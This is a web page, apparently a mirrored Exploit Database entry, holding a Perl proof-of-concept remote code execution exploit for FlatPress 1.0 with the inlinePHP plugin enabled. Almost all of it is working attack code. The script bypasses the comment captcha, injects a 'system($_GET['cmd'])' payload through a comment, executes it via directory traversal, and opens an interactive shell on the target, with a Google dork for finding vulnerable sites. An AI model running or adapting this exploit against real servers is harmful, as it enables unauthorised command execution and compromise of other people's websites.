Flatpress 1.0 – Remote Code Execution

• Exploit Database
• 18 阅读

• 作者： Wireghoul
  日期： 2013-11-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/29515/

• #!/usr/bin/perl
  # Exploit Title: Flatpress remore code execution PoC NULLday
  # Google Dork: This site is powered by FlatPress.
  # Date: 17/10/2013
  # Exploit Author: Wireghoul
  # Vendor Homepage: http://flatpress.org/home/
  # Software Link:
  http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
  # Version: v1.0
  #
  # Blended threat, executes code injected into comment
  # by loading comment as a page through directory traversal
  # Requires the inlinePHP plugin to be enabled.
  # Written by @Wireghoul - justanotherhacker.com
  #
  # This is for my peeps and the freaks in the front row -- Hilltop Hoods:
  Nosebleed section
  
  use strict;
  use warnings;
  use LWP::UserAgent;
  
  &banner;
  &usage if (!$ARGV[0]);
  my $injid = 'Spl0ited'.int(rand(9999));
  my $ua = LWP::UserAgent->new;
  $ua->timeout(10);
  $ua->env_proxy;
  $ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });
  
  sub banner {
  print "\nFlatpress remote code execution PoC by \@Wireghoul\n";
  print "=======================[ justanotherhacker.com]==\n";
  }
  
  sub usage {
  print "Usage: $0 <url>\n";
  exit;
  }
  
  my $response =
  $ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
  if (!$response->is_success) {
  print "[-] Inline PHP plugin not found at
  $ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
  } else {
  print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
  }
  # Prepare for exploitation, find entry + comment location
  $response = $ua->get($ARGV[0]);
  if ($response->is_success) {
  if ($response->decoded_content =~
  /(http.*?x=entry:entry.*?;comments:1#comments)/) {
  my $cmntlink = $1;
  print "[+] Found comment link: $cmntlink\n";
  my $aaspam = 0; # Can't be bothered solving easy captchas, just
  reload page until we get one we like
  while ($aaspam == 0) {
  $response = $ua->get($cmntlink);
  if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \?
  \(\*\)/) {
  $aaspam = $1+$2;
  print "[+] Defeated antispam $1 + $2 = $aaspam\n";
  } else {
  $response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;
  print "[*] Unknown antispam: $1 ... retrying\n";
  }
  }
  # Post a comment
  $response = $ua->post(
  $cmntlink."form",
  Content => {
  'name' => $injid,
  'email' => '',
  'url' => '',
  'aaspam' => $aaspam,
  'content' =>
  "SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
  'submit' => 'Add',
  }
  );
  $response = $ua->get($cmntlink);
  # Find link to injected content, then execute psuedo shell in loop
  my @cmnts = split (/<li id="comment/, $response->decoded_content);
  my @injected = grep /$injid/, @cmnts;
  if ($injected[0] =~ /$injid/) {
  print "[+] Injection ($injid) successful\n";
  $injected[0] =~
  m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
  my
  $shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";
  print "[*] Dropping into shell, type exit to exit\n";
  my $line='';
  while (1) {
  print '$';
  $line=<STDIN>;
  if ($line =~ /^exit$/) { exit; };
  my $output=$ua->get("$shell&cmd=$line");
  $output->decoded_content =~ /SHELL(.*)LLEHS/ms;
  my $clean = $1; $clean =~ s/<br \/>//g;
  print "$clean\n";
  }
  } else {
  print '[-] Unable to identify the injection point';
  }
  } else {
  print "[-] Comment link not found\n";
  }
  } else {
  die $response->status_line;
  }